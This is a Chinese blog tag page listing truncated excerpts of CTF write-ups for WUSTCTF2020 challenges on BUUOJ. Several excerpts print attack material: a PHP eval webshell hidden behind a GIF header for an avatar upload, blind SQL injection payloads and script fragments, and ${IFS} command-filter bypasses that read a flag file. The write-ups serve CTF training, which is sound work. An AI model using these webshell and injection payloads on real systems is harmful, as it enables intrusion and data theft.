首页 > TAG信息列表 > wustctf2020

[WUSTCTF2020]CV Maker-1|文件上传

1、打开之后未发现有用信息,各按钮无法点击,只有注册和登录可以,那就注册一个账户并进行登录,结果如下: 登陆后界面: 2、界面里就更换头像功能可以使用,那就考的是文件上传了,先随便上传一个脚本文件(右键复制文件地址)并使用菜刀或蚁剑进行连接,结果如下: 上传的php脚本信息: GIF89 <?php ev

[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker 1.进去后看到有注册页面,先注册一个账号 2.登入后,直接放了一个明显的上传头像,怀疑是uploadloud 3.先看看有没有过滤,直接就传了个带后门的php文件 GIF89a   <script language='php'>@eval($_POST['hhz']);</script> 4.然后就上传成功了(没有过滤,大大滴好评)没

BUU [WUSTCTF2020]level2

  upx 壳 先脱    然后拖入ida,打开第一个界面就是答案了。。。  

BUU [WUSTCTF2020]level1

首先还是查壳   这个提示我还去搜了   ubuntu系统下怎么安装gcc编译器        但是发现没用,直接用ida打开根本就是无壳的    循环跟output也正好都是19个能对应上 那就直接上脚本就行了 a = [198,232,816,200,1536,300,6144,984,51200,570,92160,1200,565248,756,147

[WUSTCTF2020]朴实无华

.查看源码,看到这个名字就想到了robots.txt,尝试了发现真的有 2.进入后还放了个flag在这,我认为肯定不是(以为试过了错了,所以这么自信) 3.然后在网络的响应头里看到了提示 不知道为啥一堆乱码,看着怪别扭,就照着网上师傅的wp里面的代码做了 4.首先是num要下雨2020但是num+1要大于202

[WUSTCTF2020]朴实无华

首先打开题目 只有一个Hack me,然后抓包      没有得到什么,不过title里面有个bot 于是联想到robots.txt User-agent: * Disallow: /fAke_f1agggg.php 然后打开Fake_flagggg.php     然后在抓包结果看一下,发现了  Look_at_me: /fl4g.php    于是我打开fl4g.php  

[WUSTCTF2020]CV Maker——简单的开始

[WUSTCTF2020]CV Maker 一.前言 emm,有关ssrf的题目在这期间做了几道,大部分都是关于redis和fpm的,这些题目中大多数都是直接用现成已经在市面上广为流行的脚本进行攻击的。事实上,并没有过多的参考价值,也就没有写下他们的wp。最近在复习数学,也没有时间打靶场了,拿这道最简单不过

[WUSTCTF2020]朴实无华 1

1.发现 1.1没发现提示,使用dirsearch扫描一下后台,扫到一个文件。    1.2打开文件,又是一个文件。    1.3打开文件,提示不是flag。  1.4使用bp抓一下包发现一个文件。    1.5打开文件,修改一下编码,得到PHP代码。 <?php header('Content-type:text/html;charset=utf-8'); e

wustctf2020_name_your_dog(数组越界劫持got)

wustctf2020_name_your_dog: 有一道类似的叫name_your_cat,是数组越界 逆向分析: 主界面 NameWhich函数: 根本没检查边界,num我们随便取,依旧数组越界 后门 具体步骤: got表可写,got表就在dog上面不远处,我们能改__isoc99_scanf,printf printf=0x0804A00C __isoc99_scanf=0x0804A

[WUSTCTF2020]颜值成绩查询

打开网页   改变参数stunum发现页面会发生变化。 输入1 成绩100 输入2 成绩666 最多可以输入4 通过尝试可知参数处有布尔盲注,0^1会出现1的内容,因此判断具有盲注 构造脚本 import requests url = "http://e7e05311-6b4e-4bce-8545-ff53476b26a9.node4.buuoj.cn:81" database

BUU-日刷-[WUSTCTF2020]朴实无华_套娃/intval函数

进去就是一个hackme 查看前端代码:      看到个bot,那就看看robots.txt   访问fAke_f1agggg.php   发现一个假flag  前端代码也没东西,那只能看网络请求了   看到个look_at_me字段 访问/fl4g.php   看到个朱一旦? 注意到这里有许多中文乱码,但是貌似不重要(之类本来是正常

buuctf-misc-[WUSTCTF2020]find_me

1.下载题目,一张图片,右键属性拿到一串。。。 ⡇⡓⡄⡖⠂⠀⠂⠀⡋⡉⠔⠀⠔⡅⡯⡖⠔⠁⠔⡞⠔⡔⠔⡯⡽⠔⡕⠔⡕⠔⡕⠔⡕⠔⡕⡍= 2. 有点点印象,脑子不太好使,直接百度第一个字符就ok 盲文 盲文解密 wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}

[WUSTCTF2020]颜值成绩查询

知识点:整数型注入 盲注 import requests url = "http://364ccd4d-2a09-471c-ba97-460b37d0fbae.node3.buuoj.cn/?stunum=" result = "" i = 0 while(True): i = i + 1 head = 32 tail = 127 while( head < tail): mid = (head + tail) >> 1

[WUSTCTF2020]朴实无华

[WUSTCTF2020]朴实无华 考点:1.MD5碰撞 2.命令执行绕过 打开题发现编码有些问题,修改编码为utf-8 看了源码和请求包没发现什么东西,看到title想到了robots.txt文件,打开看一看 额,打开后发现 在观察观察看到了这个 终于找到源代码了!!!开心vヾ(≧▽≦*)o php源码如下: <?php header('C

BUU-MISC-[WUSTCTF2020]spaceclub

[WUSTCTF2020]spaceclub 一开始打开txt文件,啥也没有,直接ctrl+a,全选发现了些端倪,一开始以为是摩斯电码,但是单个字符长度全是一样的。后来发现是二进制,长的是1,短的是0。 0111011101100011011101000110011000110010001100000011001000110000011110110110100000110011011100

第五十四题——[WUSTCTF2020]朴实无华

题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,访问/robots.txt文件看到提示/fAke_f1agggg.php 第二步:访问/fAke_f1agggg.php,看到提示:/fl4g.php 第三步:访问/fl4g.php看到源码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); hi

[WUSTCTF2020]find_me 1

这一题很有意思 一直在想这个备注怎么显示不全。 题目本来的图片是只读格式的,需要把只读的选项取消掉。 如果是只读格式,那么这个备注是现实不全的,而且无法复制。 这个一眼就可以看出和盲文很像。 盲文的在线地址: https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwe

BUUOJ REVERSE

41、[FlareOn4]IgniteMe [MRCTF2020]Xor [GKCTF2020]BabyDriver [MRCTF2020]hello_world_go crackMe [WUSTCTF2020]level3 [FlareOn6]Overlong [WUSTCTF2020]Cr0ssfun firmware [ACTF新生赛2020]Oruga [GXYCTF2019]simple CPP [Zer0pts2020]easy strcmp [FlareOn3]Challenge1 [GWC

[WUSTCTF2020]朴实无华

[WUSTCTF2020]朴实无华 intval绕过 $md5==md5($md5)绕过 0e215962017 getflag时如何绕过cat的限制 head${IFS}flag tac${IFS}flag more${IFS}flag less${IFS}flag nl${IFS}flag tail${IFS}flag sort${IFS}flag ca\t${IFS}flag

[WUSTCTF2020]颜值成绩查询

[WUSTCTF2020]颜值成绩查询 整数型注入,盲注。 速度快,一定要二分法。 爆库名:ctf 二分法核心payload "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid) import requests url